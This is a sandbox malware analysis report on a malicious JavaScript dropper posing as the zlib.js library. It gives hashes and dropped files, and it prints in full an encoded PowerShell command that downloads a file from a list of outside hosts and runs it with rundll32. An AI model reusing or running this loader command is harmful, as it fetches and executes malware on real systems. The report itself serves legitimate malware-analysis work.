              Analysis stop reason:Timeout
              Sample file name:Semischolastica.js
              Detection:MAL
              Classification:mal92.evad.winJS@6/6@0/0
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .js
              • Override analysis time to 240s for JS files taking high CPU consumption
              • Stop behavior analysis, all processes terminated

              Warnings

              • Exclude process from analysis (whitelisted): WMIADAP.exe
              • Execution Graph export aborted for target powershell.exe, PID 6908 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              11:27:24API Interceptor30x Sleep call for process: powershell.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\WeigelasScribbleable.js

              Download File
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with very long lines (47992), with CRLF line terminators
              Category:dropped
              Size (bytes):320228
              Entropy (8bit):4.640366993339328
              Encrypted:false
              SSDEEP:6144:ZFfjJ+xra8vNL0KrsrFLH3XcHso+wZjWCMoowzZa0hmGbmgLMa:Z5jJgl+R3XcMmjDn
              MD5:476FAD0A9B9F0B665B416BEB78B55CFF
              SHA1:C5631292A9E8C5887E3674C819CD3EE4AAB786DD
              SHA-256:AA18039B1459C1054B2EAD589186D0C3E1E02CDFEBF5F4642E1B5CC13AF8C104
              SHA-512:4286465C493953F5AB7805777D85A9C5F59F902B732438EC3C2BBB4D20E0A3C6066963E7F2FB458C9D4E80458F1463A0FE5C3AC79583EDD00704AAFB6086370C
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Reputation:low
              Preview:/**..* @license..* zlib.js..* JavaScript Zlib Library..* https://github.com/imaya/zlib.js..*..* The MIT License..*..* Copyright (c) 2012 imaya..*..* Permission is hereby granted, free of charge, to any person obtaining a copy..* of this software and associated documentation files (the "Software"), to deal..* in the Software without restriction, including without limitation the rights..* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell..* copies of the Software, and to permit persons to whom the Software is..* furnished to do so, subject to the following conditions:..*..* The above copyright notice and this permission notice shall be included in..* all copies or substantial portions of the Software...*..* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR..* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,..* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE..* AUTHORS OR COPYRIGHT HOLDERS

              C:\ProgramData\WeigelasScribbleable.js:Zone.Identifier

              Download File
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Reputation:high, very likely benign file
              Preview:[ZoneTransfer]....ZoneId=0

              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):9432
              Entropy (8bit):4.918232018284106
              Encrypted:false
              SSDEEP:192:Nxoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOh:bfib4Glkjh4iUxs14fib41
              MD5:F6775EDC5EE3B8EEDBF8310BD48C709D
              SHA1:51DBC51183BFBFE57F24E9AD63840E60D2E64842
              SHA-256:B5D6E4B1EF4F3E734E47F87E8226814AE7D574F4E458CCE4E21D637588F45B28
              SHA-512:EDCED69415369C7EBA17D72EC1691FE44F5C5DCF7565EAE1A22112E631FFBBCE72B830BBF0D91E70484BC7F0E4D59870777B07E86126438E78E15A7337D97BD6
              Malicious:false
              Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):64
              Entropy (8bit):0.9260988789684415
              Encrypted:false
              SSDEEP:3:Nlllulb/lj:NllUb/l
              MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
              SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
              SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
              SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
              Malicious:false
              Preview:@...e................................................@..........

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eg3rnj2e.acv.psm1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview:1

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsaixmmc.yur.ps1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview:1

              Static File Info

              General

              File type:ASCII text, with very long lines (47992), with CRLF line terminators
              Entropy (8bit):4.640366993339328
              TrID:
              • Digital Micrograph Script (4001/1) 100.00%
              File name:Semischolastica.js
              File size:320228
              MD5:476fad0a9b9f0b665b416beb78b55cff
              SHA1:c5631292a9e8c5887e3674c819cd3ee4aab786dd
              SHA256:aa18039b1459c1054b2ead589186d0c3e1e02cdfebf5f4642e1b5cc13af8c104
              SHA512:4286465c493953f5ab7805777d85a9c5f59f902b732438ec3c2bbb4d20e0a3c6066963e7f2fb458c9d4e80458f1463a0fe5c3ac79583edd00704aafb6086370c
              SSDEEP:6144:ZFfjJ+xra8vNL0KrsrFLH3XcHso+wZjWCMoowzZa0hmGbmgLMa:Z5jJgl+R3XcMmjDn
              TLSH:3E649680471518A24B4B7F36A730A4A5EBBE0EB9C2D4598BF46F7250FBDF94CC8D1621
              File Content Preview:/**..* @license..* zlib.js..* JavaScript Zlib Library..* https://github.com/imaya/zlib.js..*..* The MIT License..*..* Copyright (c) 2012 imaya..*..* Permission is hereby granted, free of charge, to any person obtaining a copy..* of this software and assoc

              File Icon

              Icon Hash:68d69b8bb6aa9a86

              Network Behavior

              No network behavior found

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:11:26:30
              Start date:26/05/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Semischolastica.js"
              Imagebase:0x7ff624190000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:2
              Start time:11:27:19
              Start date:26/05/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\wscript.exe" "C:\ProgramData\WeigelasScribbleable.js" ProtopathicCosmographically pachisisCounterproductiveness KnowingestGemmer theoreticianRoundishness
              Imagebase:0x7ff624190000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:3
              Start time:11:27:21
              Start date:26/05/2023
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAbQBBAEcAawBBAFkAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBNAHcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABjAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBZAFEAQgAxAEEARwA0AEEAWQB3AEIAbwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBoAEEARwAwAEEAWgBRAEIAegBBAEEAPQA9AGEAbgBuAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQB3AEEAdQBBAEQAWQBBAE0AdwBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQB3AEEANQBBAEEAPQA9ACIAOwAkAGYAbABlAHQAYwBoAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGIAdwBCAGgAQQBHAFEAQQBaAFEAQgB5AEEARgBBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAHkAQQBHADgAQQBaAHcAQgBoAEEARwAwAEEAYQBRAEIAaABBAEMANABBAGIAQQBCAHAAQQBHADQAQQBhAHcAQQA9ACIAOwAkAFEAdQBpAHoAegBlAGUARABlAGMAZQBsAGUAcgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQAiADsAJABpAG0AbQBhAHIAYwBlAHMAYwBpAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAUQBBAEwAdwBCADYAQQBFAFEAQQBNAGcAQgBrAEEARQBJAEEATAB3AEIAMwBBAEQAUQBBAFQAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBOAEEAQQAxAEEAQwA4AEEAVABnAEIATgBBAEUASQBBAFQAQQBBAHYAQQBHAEUAQQBSAFEAQgA1AEEARQA0AEEAYgB3AEEAPQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBADQAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEAMgBBAEQAVQBBAEwAdwBBAHkAQQBHAFkAQQBMAHcAQgBUAEEAQQA9AD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQB3AEEAWgBBAEIAWABBAEcAUQBBAFIAQQBCAEcAQQBBAD0APQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBIAGcAQQBhAEEAQgBaAEEASABnAEEAZABBAEIAUgBBAEQAQQBBAFMAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQQA0AEEARQBZAEEATgBRAEIATgBBAEQAVQBBAE4AdwBCAEIAQQBFAG8AQQBaAEEAQQA1AEEARwBJAEEATQB3AEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABUAGUAbgBhAGkAbABsAGUAIABpAG4AIAAkAGkAbQBtAGEAcgBjAGUAcwBjAGkAYgBsAGUAIAAtAHMAcABsAGkAdAAgACIAUQAiACkAIAB7AHQAcgB5ACAAewAkAEEAcgB0AGkAZgBpAGMAaQBhAGwAaQB0AGkAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATwBRAEEAdQBBAEQARQBBAE0AZwBBADIAQQBDADQAQQBNAGcAQQAwAEEARABZAEEATABnAEEANQBBAEQAWQBBACIAOwAkAGgAeQBkAHIAYQB1AGwAaQBjAEMAYQBwAHAAYQBkAG8AYwBpAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAYwBBAE0AUQBBAHUAQQBEAEUAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMABBAEQASQBBAEwAZwBBAHkAQQBEAFEAQQBNAEEAQQA9AEkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAegBBAEMANABBAE0AUQBBADMAQQBEAFEAQQBMAGcAQQB4AEEARABrAEEATgBRAEEAdQBBAEQARQBBAE4AUQBBAHkAQQBBAD0APQBJAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQwBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBjAEEAQgBoAEEASABRAEEAWgBRAEEAdQBBAEgATQBBAGQAUQBCAHcAQQBIAEEAQQBiAEEAQgA1AEEAQQA9AD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAFEAQQAwAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQAaQBtAGIAcgBpAGMAYQB0AGUAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB4AEEASABVAEEAYQBRAEIAawBBAEcARQBBAGIAUQBBAHUAQQBHAFUAQQBiAGcAQgBuAEEARwBrAEEAYgBnAEIAbABBAEcAVQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQA9AFgAdABJAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBAHcAQQBDADQAQQBPAEEAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAWQBBAFgAdABJAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBnAEEAWQBRAEIAdQBBAEcAUQBBAGQAdwBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWgB3AEIAeQBBAEcARQBBAGQAQQBCAHAAQQBIAE0AQQAiADsAJABlAG4AYQBtAGkAbgBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVABlAG4AYQBpAGwAbABlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAZQBuAGEAbQBpAG4AZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHAAYQByAGEAcwBuAGkAYQBCAGUAbAB0AGUAbgBlAC4AVQBuAGgAaQB0AGMAaABlAGQARwBhAG0AYgBhAHMAOwAkAEgAYQB5AGMAbwBjAGsAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBPAEEAQQB1AEEARABnAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAGsAQQBNAEEAQQA9AEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBVAEEAZQBBAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAYQBRAEIAegBBAEcAMABBAEwAZwBCADMAQQBHAFUAQQBZAGcAQgBqAEEARwBFAEEAYgBRAEEAPQBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgATQBBAFkAdwBCAHAAQQBIAFEAQQBhAFEAQgBqAEEARwBFAEEAYgBBAEIARABBAEcARQBBAGMAZwBCADUAQQBHADgAQQBZAHcAQgBoAEEASABJAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQQA9AD0AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE4AQQBHAGsAQQBjAHcAQgB2AEEARwBNAEEAWQBRAEIAdwBBAEcANABBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgAxAEEASABNAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcABhAHIAYQBzAG4AaQBhAEIAZQBsAHQAZQBuAGUALgBVAG4AaABpAHQAYwBoAGUAZABHAGEAbQBiAGEAcwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAOQA4ADAANgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEASABBAEEAWQBRAEIAeQBBAEcARQBBAGMAdwBCAHUAQQBHAGsAQQBZAFEAQgBDAEEARwBVAEEAYgBBAEIAMABBAEcAVQBBAGIAZwBCAGwAQQBDADQAQQBWAFEAQgB1AEEARwBnAEEAYQBRAEIAMABBAEcATQBBAGEAQQBCAGwAQQBHAFEAQQBSAHcAQgBoAEEARwAwAEEAWQBnAEIAaABBAEgATQBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgByAGUAZQBjAGgAYwBsAG8AdABoAFMAbwB1AGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEASABJAEEAWgBRAEIAegBBAEgAQQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgBrAEEARQA4AEEAZABRAEIAMABBAEcASQBBAFkAUQBCAHkAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEATABnAEIAaABBAEcATQBBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEARwBFAEEAYgBnAEIAMABBAEgATQBBAGIAVgBaAHgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYQBBAEIAcABBAEgAQQBBAGQAdwBCAHkAQQBHAGsAQQBaAHcAQgBvAEEASABRAEEAWgBRAEIAeQBBAEgAawBBAEwAZwBCADEAQQBHAHMAQQBiAFYAWgB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAQQBCAGwAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAYwB3AEIAMABBAEYAQQBBAGMAZwBCAGwAQQBHAFUAQQBiAGcAQgBwAEEARwA0AEEAWgB3AEEAdQBBAEcASQBBAGMAZwBCADEAQQBIAE0AQQBjAHcAQgBsAEEARwB3AEEAYwB3AEEAPQAiADsAJABhAGwAaQBlAG4AaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBADUAQQBDADQAQQBNAFEAQQAxAEEARABjAEEAIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA=
              Imagebase:0x7ff7466a0000
              File size:447488 bytes
              MD5 hash:95000560239032BC68B4C2FDFCDEF913
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Reputation:high

              General

              Target ID:4
              Start time:11:27:21
              Start date:26/05/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6da640000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              No disassembly